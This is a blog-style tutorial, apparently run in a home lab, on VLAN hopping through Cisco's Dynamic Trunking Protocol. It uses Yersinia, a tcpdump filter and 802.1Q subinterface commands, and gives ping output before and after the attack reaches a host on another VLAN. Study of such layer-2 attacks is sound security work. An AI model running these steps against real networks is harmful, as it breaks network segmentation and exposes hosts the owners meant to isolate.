VLAN hopping via DTP (Dynamic Trunking Protocol) using Yersinia
Hi. In this article I’m going to explain, in a very summarized way, how we can hop VLANs via Dynamic Trunking Protocol (DTP) using a tool called Yersinia. Please note that DTP is a Cisco propietary protocol so we’ll need a Cisco switch in our environment to perform this kind of attack.
In order to make the attack successful, the switch mode has to be set on dynamic desirable, dynamic auto or trunk so the switches can be negotiating and sending DTP packets. By default, the Cisco switches are set to dynamic desirable.
This the topology design for our testing:
The attack step-by-step
First of all we do verify that hosts on VLAN10 can ping each other.
Ping from Attacker to Host B:
┌──(kali㉿kali)-[~]└─$ ping 192.168.10.3PING 192.168.10.3 (192.168.10.3) 56(84) bytes of data.64 bytes from 192.168.10.3: icmp_seq=1 ttl=64 time=0.431 ms64 bytes from 192.168.10.3: icmp_seq=2 ttl=64 time=0.590 ms64 bytes from 192.168.10.3: icmp_seq=3 ttl=64 time=0.477 ms64 bytes from 192.168.10.3: icmp_seq=4 ttl=64 time=0.261 ms^C--- 192.168.10.3 ping statistics ---4 packets transmitted, 4 received, 0% packet loss, time 3072msrtt min/avg/max/mdev = 0.261/0.439/0.590/0.118 ms
From Host B to Attacker:
HostB~» ping 192.168.10.2PING 192.168.10.2 (192.168.10.2) 56(84) bytes of data.64 bytes from 192.168.10.2: icmp_seq=1 ttl=64 time=0.242 ms64 bytes from 192.168.10.2: icmp_seq=2 ttl=64 time=0.441 ms64 bytes from 192.168.10.2: icmp_seq=3 ttl=64 time=0.432 ms64 bytes from 192.168.10.2: icmp_seq=4 ttl=64 time=0.425 ms^C--- 192.168.10.2 ping statistics ---4 packets transmitted, 4 received, 0% packet loss, time 70msrtt min/avg/max/mdev = 0.242/0.385/0.441/0.082 ms
Let’s check out that we can’t reach the victim host from our attacker computer doing a ping:
┌──(kali㉿kali)-[~]└─$ ping 192.168.20.2PING 192.168.20.2 (192.168.20.2) 56(84) bytes of data.From 192.168.10.1 icmp_seq=1 Destination Host UnreachableFrom 192.168.10.1 icmp_seq=2 Destination Host UnreachableFrom 192.168.10.1 icmp_seq=3 Destination Host Unreachable^C--- 192.168.20.2 ping statistics ---7 packets transmitted, 0 received, +6 errors, 100% packet loss, time 6067ms
(Origin sender is 192.168.10.1 because I am using this host as gateway in our VLAN)
Now we want that victim host to be reachable by our host. We are going to use a tool called Yersinia, a very powerful tool to perform layer 2 attacks. It comes preinstalled in Kali.
We’ll proceed to open yersinia in graphical mode running this command:
sudo yersinia -GThen we’ll click on “Launch attack” and go to the DTP tab. Here we’ll enable the “enabling trunking” radio button:
Before clicking “OK” we may set a listener for DTP packets to check out that our DTP attack is being performed. We can set this listener using tcpdump executing it as follows:
sudo tcpdump -n -v -i eth0 -s 0 'ether[20:2] == 0x2004'Please note that my interface network identified is eth0 but yours may differ.
Then we click OK in the attack window in yersinia and we’ll see the packets being sent in our tcpdump listener:
Now we only have to create a new VLAN interface setting it the ID=20 with a not used IP address. Make sure to set an IP that is not being used in the victim VLAN, we’ll use a high ip (192.168.20.80) for the case. To achive this we’ll execute this commands in our kali (attacker machine):
~$ modprobe 8021q~$ vconfig add eth0 20~$ ifconfig eth0.20 up~$ ifconfig eth0.20 192.168.20.80 up
Then we’ll restart our network adapter and we’ll ping our victims host. We should reach it now and receive a response!
┌──(kali㉿kali)-[~]└─$ ping 192.168.20.2PING 192.168.20.2 (192.168.20.2) 56(84) bytes of data.64 bytes from 192.168.20.2: icmp_seq=1 ttl=64 time=0.502 ms64 bytes from 192.168.20.2: icmp_seq=2 ttl=64 time=0.483 ms64 bytes from 192.168.20.2: icmp_seq=3 ttl=64 time=0.371 ms64 bytes from 192.168.20.2: icmp_seq=4 ttl=64 time=0.355 ms^C--- 192.168.20.2 ping statistics ---4 packets transmitted, 4 received, 0% packet loss, time 2834msrtt min/avg/max/mdev = 0.355/0.427/0.502/0.105 ms
Thanks for reading, hope it may be helpful at some point of your cybersecurity career ;)
